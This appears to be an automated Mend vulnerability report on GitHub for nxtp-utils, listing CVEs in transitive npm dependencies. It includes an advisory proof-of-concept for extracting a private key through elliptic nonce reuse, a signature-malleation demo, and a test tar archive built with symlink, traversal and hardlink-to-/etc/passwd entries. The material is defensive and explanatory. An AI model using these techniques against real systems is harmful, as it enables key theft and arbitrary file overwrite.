
nxtp-utils-2.5.0-alpha.8.tgz: 62 vulnerabilities (highest severity is: 10.0) [main] (unreachable) #120

@renovate

Description

📂 Vulnerable Library - nxtp-utils-2.5.0-alpha.8.tgz

Common utilities for use within the @connext/nxtp-* packages

Path to dependency file: /package.json

Path to vulnerable library: /packages/utils/package.json

Partial results (27 findings) are displayed below due to a content size limitation in GitHub. To view information on the remaining findings, navigate to the Mend Application.

Findings

| Finding | Severity | 🎯 CVSS | Exploit Maturity | EPSS | Library | Type | Fixed in | Remediation Available | Reachability |
|---|---|---|---|---|---|---|---|---|---|
| CVE-2025-6545 | 🟣 Critical | 10.0 | Not Defined | < 1% | pbkdf2-3.1.2.tgz | Transitive | N/A | | Unreachable |
| CVE-2023-46233 | 🟣 Critical | 9.1 | Not Defined | < 1% | crypto-js-3.3.0.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-48949 | 🟣 Critical | 9.1 | Not Defined | < 1% | elliptic-6.5.5.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-23950 | 🔴 High | 8.8 | Not Defined | < 1% | tar-4.4.19.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-23950 | 🔴 High | 8.8 | Not Defined | < 1% | tar-6.2.0.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-7783 | 🔴 High | 8.7 | Not Defined | < 1% | form-data-2.3.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-9287 | 🔴 High | 8.7 | Not Defined | < 1% | cipher-base-1.0.4.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-9288 | 🔴 High | 8.7 | Not Defined | < 1% | sha.js-2.4.11.tgz | Transitive | N/A | | Unreachable |
| WS-2025-0006 | 🔴 High | 8.6 | N/A | N/A | elliptic-6.5.5.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-24842 | 🔴 High | 8.2 | Not Defined | < 1% | tar-6.2.0.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-24842 | 🔴 High | 8.2 | Not Defined | < 1% | tar-4.4.19.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-21505 | 🔴 High | 7.5 | Proof of concept | < 1% | web3-utils-1.10.4.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-21538 | 🔴 High | 7.5 | Proof of concept | < 1% | cross-spawn-7.0.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-37890 | 🔴 High | 7.5 | Not Defined | < 1% | ws-3.3.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-45296 | 🔴 High | 7.5 | Not Defined | < 1% | path-to-regexp-0.1.7.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-45590 | 🔴 High | 7.5 | Not Defined | 1.5% | body-parser-1.20.2.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-48930 | 🔴 High | 7.5 | Not Defined | < 1% | secp256k1-4.0.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2024-52798 | 🔴 High | 7.5 | Not Defined | < 1% | path-to-regexp-0.1.7.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-27152 | 🔴 High | 7.5 | Not Defined | < 1% | axios-1.3.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-27611 | 🔴 High | 7.5 | Not Defined | < 1% | base-x-3.0.9.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-57330 | 🔴 High | 7.5 | Not Defined | < 1% | web3-core-subscriptions-1.10.4.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-58754 | 🔴 High | 7.5 | Not Defined | < 1% | axios-1.3.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2025-64756 | 🔴 High | 7.5 | Not Defined | < 1% | glob-10.3.10.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-25639 | 🔴 High | 7.5 | Not Defined | < 1% | axios-1.3.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-26996 | 🔴 High | 7.5 | Not Defined | < 1% | minimatch-9.0.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-27903 | 🔴 High | 7.5 | Not Defined | < 1% | minimatch-9.0.3.tgz | Transitive | N/A | | Unreachable |
| CVE-2026-27904 | 🔴 High | 7.5 | Not Defined | < 1% | minimatch-9.0.3.tgz | Transitive | N/A | | Unreachable |

Details

🟣CVE-2025-6545

Vulnerable Library - pbkdf2-3.1.2.tgz

This library provides the functionality of PBKDF2 with the ability to use any supported hashing algorithm returned from crypto.getHashes()

Library home page: https://registry.npmjs.org/pbkdf2/-/pbkdf2-3.1.2.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • ethereum-cryptography-0.1.3.tgz
          • pbkdf2-3.1.2.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Improper Input Validation vulnerability in pbkdf2 allows Signature Spoofing by Improper Validation. This vulnerability is associated with program file lib/to-buffer.js.
This issue affects pbkdf2: from 3.0.10 through 3.1.2.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Jun 23, 2025 06:41 PM

URL: CVE-2025-6545

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 10.0


Suggested Fix

Type: Upgrade version

Origin: GHSA-h7cp-r72f-jxh6

Release Date: Jun 23, 2025 06:41 PM

Fix Resolution : pbkdf2 - 3.1.3,https://github.com/browserify/pbkdf2.git - v3.1.3

🟣CVE-2023-46233

Vulnerable Library - crypto-js-3.3.0.tgz

JavaScript library of crypto standards.

Library home page: https://registry.npmjs.org/crypto-js/-/crypto-js-3.3.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • merkletreejs-0.3.9.tgz
      • crypto-js-3.3.0.tgz (Vulnerable Library)
  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • sdk-1.0.0.tgz
      • merkletreejs-0.2.32.tgz
        • crypto-js-3.3.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

crypto-js is a JavaScript library of crypto standards. Prior to version 4.2.0, crypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and at least 1,300,000 times weaker than current industry standard. This is because it both defaults to SHA1, a cryptographic hash algorithm considered insecure since at least 2005, and defaults to one single iteration, a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to preimage and collision attacks. If used to protect passwords, the impact is high. If used to generate signatures, the impact is high. Version 4.2.0 contains a patch for this issue. As a workaround, configure crypto-js to use SHA256 with at least 250,000 iterations.

Publish Date: Oct 25, 2023 08:49 PM

URL: CVE-2023-46233

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 9.1


Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2023-46233

Release Date: Oct 25, 2023 08:49 PM

Fix Resolution : crypto-js - 4.2.0

🟣CVE-2024-48949

Vulnerable Library - elliptic-6.5.5.tgz

Library home page: https://registry.npmjs.org/elliptic/-/elliptic-6.5.5.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • elliptic-6.5.5.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • eth-json-rpc-filters-4.2.2.tgz
        • eth-json-rpc-middleware-6.0.0.tgz
          • ethereumjs-util-5.2.1.tgz
            • elliptic-6.5.5.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

The verify function in lib/elliptic/eddsa/index.js in the Elliptic package before 6.5.6 for Node.js omits "sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()" validation.

Publish Date: Oct 10, 2024 12:00 AM

URL: CVE-2024-48949

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 9.1


Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2024-48949

Release Date: Oct 10, 2024 12:00 AM

Fix Resolution : elliptic - 6.5.6
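The range check that the description above says elliptic's EdDSA `verify` omitted, written out as an added example (this is not elliptic's code and not part of the Mend report). The Ed25519 group order `L` is the standard constant; the 64-byte sample signature is constructed here and is not a real signature. The block also shows why the check matters: `S + L` still fits in 32 bytes, so without the check a verifier that only reduces `S` modulo `L` accepts a second, distinct encoding of every valid signature.

```javascript
// Added example: the S-range check missing from elliptic < 6.5.6 (CVE-2024-48949).
// L is the Ed25519 group order from RFC 8032; SAMPLE_SIG below is constructed test data.
const L = 2n ** 252n + 27742317777372353535851937790883648493n;

function leBytesToBigInt(bytes) {
  let v = 0n;
  for (let i = bytes.length - 1; i >= 0; i--) v = (v << 8n) | BigInt(bytes[i]);
  return v;
}

function bigIntToLeBytes(v, len) {
  const out = new Uint8Array(len);
  for (let i = 0; i < len; i++) { out[i] = Number(v & 0xFFn); v >>= 8n; }
  return out;
}

// An Ed25519 signature is R (32 bytes) || S (32 bytes, little-endian).
// RFC 8032 requires 0 <= S < L; this is the "S >= n || S is negative" rejection the
// advisory says was skipped. Returns S when the encoding is canonical, throws otherwise.
function checkSignatureRange(sig) {
  if (sig.length !== 64) throw new Error('signature must be 64 bytes');
  const S = leBytesToBigInt(sig.subarray(32));
  if (S >= L) throw new Error('non-canonical signature: S >= L');
  return S;
}

function isCanonical(sig) {
  try { checkSignatureRange(sig); return true; } catch { return false; }
}

// Malleability demo: S + L < 2^256, so it re-encodes into the same 32 bytes, and
// [S + L]B == [S]B on the curve, so a verifier without the range check accepts it.
function malleate(sig) {
  const S = checkSignatureRange(sig);
  const forged = new Uint8Array(sig);
  forged.set(bigIntToLeBytes(S + L, 32), 32);
  return forged;
}

// Constructed sample: arbitrary R bytes and a small S; only the S range matters here.
const SAMPLE_SIG = new Uint8Array(64);
SAMPLE_SIG.fill(0x11, 0, 32);
SAMPLE_SIG.set(bigIntToLeBytes(123456789n, 32), 32);

console.log('sample canonical:', isCanonical(SAMPLE_SIG));   // true
console.log('forged canonical:', isCanonical(malleate(SAMPLE_SIG))); // false
```

Any verifier that parses `S` itself should reject the forged form before doing any curve arithmetic; a library that reduces `S` modulo `L` first will validate both encodings and leave consumers that key on signature bytes (dedup tables, replay caches) exposed.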

🔴CVE-2026-23950

Vulnerable Library - tar-4.4.19.tgz

tar for node

Library home page: https://registry.npmjs.org/tar/-/tar-4.4.19.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • tar-4.4.19.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

node-tar, a tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions.

The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS, in which "ß" causes an inode collision with "ss"). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive.

The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')".

As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data, should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

Publish Date: Jan 20, 2026 12:40 AM

URL: CVE-2026-23950

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.8


Suggested Fix

Type: Upgrade version

Origin: GHSA-r6q2-hw4h-h46w

Release Date: Jan 20, 2026 12:40 AM

Fix Resolution : https://github.com/isaacs/node-tar.git - v7.5.4,tar - 7.5.4

🔴CVE-2026-23950

Vulnerable Library - tar-6.2.0.tgz

Library home page: https://registry.npmjs.org/tar/-/tar-6.2.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • make-fetch-happen-13.0.0.tgz
          • cacache-18.0.2.tgz
            • tar-6.2.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

node-tar, a tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions.

The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS, in which "ß" causes an inode collision with "ss"). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive.

The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')".

As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data, should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

Publish Date: Jan 20, 2026 12:40 AM

URL: CVE-2026-23950

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.8


Suggested Fix

Type: Upgrade version

Origin: GHSA-r6q2-hw4h-h46w

Release Date: Jan 20, 2026 12:40 AM

Fix Resolution : https://github.com/isaacs/node-tar.git - v7.5.4,tar - 7.5.4

🔴CVE-2025-7783

Vulnerable Library - form-data-2.3.3.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • request-2.88.2.tgz
                  • form-data-2.3.3.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • web3-provider-1.8.0.tgz
      • web3-provider-engine-16.0.1.tgz
        • request-2.88.2.tgz
          • form-data-2.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution (HPP). This vulnerability is associated with program file lib/form_data.js.
This issue affects form-data: < 2.5.4, 3.0.0 - 3.0.3, 4.0.0 - 4.0.3.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Jul 18, 2025 04:34 PM

URL: CVE-2025-7783

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7


Suggested Fix

Type: Upgrade version

Origin: GHSA-fjxv-7rqg-78g4

Release Date: Jul 18, 2025 04:34 PM

Fix Resolution : form-data - 2.5.4,form-data - 3.0.4,https://github.com/form-data/form-data.git - v2.5.4,form-data - 4.0.4,https://github.com/form-data/form-data.git - v4.0.4,https://github.com/form-data/form-data.git - v3.0.4

🔴CVE-2025-9287

Vulnerable Library - cipher-base-1.0.4.tgz

abstract base class for crypto-streams

Library home page: https://registry.npmjs.org/cipher-base/-/cipher-base-1.0.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • create-hash-1.2.0.tgz
          • cipher-base-1.0.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation. This issue affects cipher-base: through 1.0.4.

Publish Date: Aug 20, 2025 09:43 PM

URL: CVE-2025-9287

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7


Suggested Fix

Type: Upgrade version

Origin: GHSA-cpq7-6gpm-g9rc

Release Date: Aug 20, 2025 09:43 PM

Fix Resolution : cipher-base - 1.0.5

🔴CVE-2025-9288

Vulnerable Library - sha.js-2.4.11.tgz

Streamable SHA hashes in pure javascript

Library home page: https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-3.8.2.tgz
      • ethereumjs-util-7.1.5.tgz
        • create-hash-1.2.0.tgz
          • sha.js-2.4.11.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • sha.js-2.4.11.tgz (Vulnerable Library)
  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • linea-sdk-0.3.0.tgz
      • typeorm-0.3.20.tgz
        • sha.js-2.4.11.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Improper Input Validation vulnerability in sha.js allows Input Data Manipulation. This issue affects sha.js: through 2.4.11.

Publish Date: Aug 20, 2025 09:59 PM

URL: CVE-2025-9288

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.7


Suggested Fix

Type: Upgrade version

Origin: browserify/sha.js@f2a258e

Release Date: Aug 20, 2025 09:59 PM

Fix Resolution : https://github.com/browserify/sha.js.git - v2.4.12,sha.js - 2.4.12

🔴WS-2025-0006

Vulnerable Library - elliptic-6.5.5.tgz

Library home page: https://registry.npmjs.org/elliptic/-/elliptic-6.5.5.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • elliptic-6.5.5.tgz (Vulnerable Library)
  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • eth-json-rpc-filters-4.2.2.tgz
        • eth-json-rpc-middleware-6.0.0.tgz
          • ethereumjs-util-5.2.1.tgz
            • elliptic-6.5.5.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

Summary

Private key can be extracted from ECDSA signature upon signing a malformed input (e.g. a string or a number), which could e.g. come from JSON network input. Note that "elliptic" by design accepts hex strings as one of the possible input types.

Details

In this code: https://github.com/indutny/elliptic/blob/3e46a48fdd2ef2f89593e5e058d85530578c9761/lib/elliptic/ec/index.js#L100-L107 "msg" is a BN instance after conversion, but "nonce" is an array, and different BN instances could generate equivalent arrays after conversion. Meaning that the same "nonce" could be generated for different messages used in the signing process, leading to "k" reuse, leading to private key extraction from a pair of signatures.

Such a message can be constructed for any already known message/signature pair, meaning that the attack needs only a single malicious message being signed for a full key extraction.

While signing unverified attacker-controlled messages would be problematic itself (and exploitation of this needs such a scenario), signing a single message still should not leak the private key.

Also, message validation could have the same bug (out of scope for this report, but could be possible in some situations), which makes this attack more likely when used in a chain.

PoC

"k" reuse example:

```javascript
import elliptic from 'elliptic'
const { ec: EC } = elliptic
const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'ed25519' // or any other curve, e.g. secp256k1
const ec = new EC(curve)
const prettyprint = ({ r, s }) => `r: ${r}, s: ${s}`
const sig0 = prettyprint(ec.sign(Buffer.alloc(32, 1), privateKey)) // array of ones
const sig1 = prettyprint(ec.sign('01'.repeat(32), privateKey)) // same message in hex form
const sig2 = prettyprint(ec.sign('-' + '01'.repeat(32), privateKey)) // same "r", different "s"
console.log({ sig0, sig1, sig2 })
```

Full attack

This doesn't include code for generation/recovery on purpose (but it's rather trivial):

```javascript
import elliptic from 'elliptic'
const { ec: EC } = elliptic
const privateKey = crypto.getRandomValues(new Uint8Array(32))
const curve = 'secp256k1' // or any other curve, e.g. ed25519
const ec = new EC(curve)
// Any message, e.g. previously known signature
const msg0 = crypto.getRandomValues(new Uint8Array(32))
const sig0 = ec.sign(msg0, privateKey)
// Attack
const msg1 = funny(msg0) // this is a string here, but can also be of other non-Uint8Array types
const sig1 = ec.sign(msg1, privateKey)
const something = extract(msg0, sig0, sig1, curve)
console.log('Curve:', curve)
console.log('Typeof:', typeof msg1)
console.log('Keys equal?', Buffer.from(privateKey).toString('hex') === something)
const rnd = crypto.getRandomValues(new Uint8Array(32))
const st = (x) => JSON.stringify(x)
console.log('Keys equivalent?', st(ec.sign(rnd, something).toDER()) === st(ec.sign(rnd, privateKey).toDER()))
console.log('Orig key:', Buffer.from(privateKey).toString('hex'))
console.log('Restored:', something)
```

Output:

```
Curve: secp256k1
Typeof: string
Keys equal? true
Keys equivalent? true
Orig key: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a
Restored: c7870f7eb3e8fd5155d5c8cdfca61aa993eed1fbe5b41feef69a68303248c22a
```

Similar for "ed25519", but due to low "n", the key might not match precisely but is nevertheless equivalent for signing:

```
Curve: ed25519
Typeof: string
Keys equal? false
Keys equivalent? true
Orig key: f1ce0e4395592f4de24f6423099e022925ad5d2d7039b614aaffdbb194a0d189
Restored: 01ce0e4395592f4de24f6423099e0227ec9cb921e3b7858581ec0d26223966a6
```

"restored" is equal to "orig" mod "N".

Impact

Full private key extraction when signing a single malicious message (that passes "JSON.stringify"/"JSON.parse").

Publish Date: Feb 11, 2025 10:00 PM

URL: WS-2025-0006

Threat Assessment

Exploit Maturity:N/A

EPSS:N/A

Score: 8.6


Suggested Fix

Type: Upgrade version

Origin: GHSA-vjh7-7g9h-fjfh

Release Date: Feb 11, 2025 10:00 PM

Fix Resolution : elliptic - 6.6.1

🔴CVE-2026-24842

Vulnerable Library - tar-6.2.0.tgz

Library home page: https://registry.npmjs.org/tar/-/tar-6.2.0.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • make-fetch-happen-13.0.0.tgz
          • cacache-18.0.2.tgz
            • tar-6.2.0.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

node-tar, a tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.

Publish Date: Jan 28, 2026 12:20 AM

URL: CVE-2026-24842

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.2


Suggested Fix

Type: Upgrade version

Origin: isaacs/node-tar@f4a7aa9

Release Date: Jan 28, 2026 12:20 AM

Fix Resolution : tar - 7.5.7,https://github.com/isaacs/node-tar.git - v7.5.7

🔴CVE-2026-24842

Vulnerable Library - tar-4.4.19.tgz

tar for node

Library home page: https://registry.npmjs.org/tar/-/tar-4.4.19.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • tar-4.4.19.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable


Vulnerability Details

node-tar, a tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.

Publish Date: Jan 28, 2026 12:20 AM

URL: CVE-2026-24842

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 8.2


Suggested Fix

Type: Upgrade version

Origin: isaacs/node-tar@f4a7aa9

Release Date: Jan 28, 2026 12:20 AM

Fix Resolution : tar - 7.5.7,https://github.com/isaacs/node-tar.git - v7.5.7
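An added example covering the two node-tar findings above (this is not node-tar's code and not part of the Mend report): it builds a small ustar archive in memory from constructed entries, parses it with header checksum verification, and then applies three entry-level checks before anything would be extracted. The checks are the ones the advisories point at: drop every SymbolicLink entry (the CVE-2026-23950 workaround npm uses), detect names that collide under the normalization the 7.5.4 fix describes (NFKD, then lower-case, then upper-case with the `en` locale, so `ß` and `ss` meet), and resolve hardlink targets with the same path rule as ordinary entries so the check and the link creation cannot disagree (the CVE-2026-24842 mismatch). The extraction root `/srv/extract` is a hypothetical value, and the collision key compares whole entry names rather than node-tar's per-directory reservations.

```javascript
// Added example, not code from node-tar or the Mend report. Constructed data throughout.
const BLOCK = 512;
const ROOT = '/srv/extract'; // hypothetical extraction directory

// Build one ustar header plus zero-padded data blocks. typeflag: '0' file, '1' hardlink,
// '2' symlink, '5' directory. The checksum is computed with the field set to spaces.
function tarEntry(name, typeflag, { linkname = '', content = '' } = {}) {
  const header = Buffer.alloc(BLOCK, 0);
  const data = Buffer.from(content, 'utf8');
  header.write(name, 0, 100, 'utf8');
  header.write('0000644\0', 100, 8);                                       // mode
  header.write('0000000\0', 108, 8);                                       // uid
  header.write('0000000\0', 116, 8);                                       // gid
  header.write(data.length.toString(8).padStart(11, '0') + '\0', 124, 12); // size
  header.write('00000000000\0', 136, 12);                                  // mtime
  header.write('        ', 148, 8);                                        // chksum placeholder
  header.write(typeflag, 156, 1);
  header.write(linkname, 157, 100, 'utf8');
  header.write('ustar\0', 257, 6);
  header.write('00', 263, 2);
  let sum = 0;
  for (const b of header) sum += b;
  header.write(sum.toString(8).padStart(6, '0') + '\0 ', 148, 8);
  const padded = Buffer.alloc(Math.ceil(data.length / BLOCK) * BLOCK, 0);
  data.copy(padded);
  return Buffer.concat([header, padded]);
}

// Walk the archive, verify every header checksum, return {name, type, linkname, size}.
function parseTar(buf) {
  const entries = [];
  for (let off = 0; off + BLOCK <= buf.length; ) {
    const h = buf.subarray(off, off + BLOCK);
    if (h.every((b) => b === 0)) break; // end-of-archive zero block
    const field = (s, l) => h.toString('utf8', s, s + l).replace(/\0.*$/s, '');
    let sum = 0;
    for (let i = 0; i < BLOCK; i++) sum += i >= 148 && i < 156 ? 0x20 : h[i];
    if (sum !== parseInt(field(148, 8).trim(), 8)) throw new Error(`bad checksum at ${off}`);
    const size = parseInt(field(124, 12).trim() || '0', 8);
    entries.push({ name: field(0, 100), type: field(156, 1) || '0', linkname: field(157, 100), size });
    off += BLOCK + Math.ceil(size / BLOCK) * BLOCK;
  }
  return entries;
}

// One resolution rule for every path kind (entry names and hardlink targets alike).
function resolveUnder(root, p) {
  const out = [];
  for (const seg of (p.startsWith('/') ? p : root + '/' + p).split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop(); else out.push(seg);
  }
  return '/' + out.join('/');
}
const inside = (root, abs) => abs === root || abs.startsWith(root + '/');

// Collision key as the 7.5.4 fix is described above: NFKD, toLocaleLowerCase('en'),
// toLocaleUpperCase('en'). Both 'ß' and 'ss' become 'SS'. Trailing '/' is ignored.
const collisionKey = (name) =>
  name.replace(/\/+$/, '').normalize('NFKD').toLocaleLowerCase('en').toLocaleUpperCase('en');

function vetEntries(entries, root = ROOT) {
  const findings = [];
  const firstByKey = new Map();
  for (const e of entries) {
    if (!inside(root, resolveUnder(root, e.name))) findings.push({ name: e.name, reason: 'path traversal' });
    if (e.type === '2') findings.push({ name: e.name, reason: 'symlink entry (drop, as npm does)' });
    if (e.type === '1' && !inside(root, resolveUnder(root, e.linkname))) {
      findings.push({ name: e.name, reason: 'hardlink target escapes root' });
    }
    const key = collisionKey(e.name);
    if (firstByKey.has(key) && firstByKey.get(key) !== e.name) {
      findings.push({ name: e.name, reason: `collides with "${firstByKey.get(key)}" after normalization` });
    } else if (!firstByKey.has(key)) {
      firstByKey.set(key, e.name);
    }
  }
  return findings;
}

// Constructed archive: a benign file, directory "ss/", a symlink named "ß" that collides
// with it on APFS, a traversal name, and a hardlink whose target leaves the root.
function sampleArchive() {
  return Buffer.concat([
    tarEntry('ok.txt', '0', { content: 'hello\n' }),
    tarEntry('ss/', '5'),
    tarEntry('ß', '2', { linkname: '/etc' }),
    tarEntry('ss/passwd', '0', { content: 'root:x:0:0\n' }),
    tarEntry('../escape.txt', '0', { content: 'x' }),
    tarEntry('link', '1', { linkname: '../../etc/passwd' }),
    Buffer.alloc(BLOCK * 2, 0),
  ]);
}

const scanSampleArchive = () => vetEntries(parseTar(sampleArchive()));
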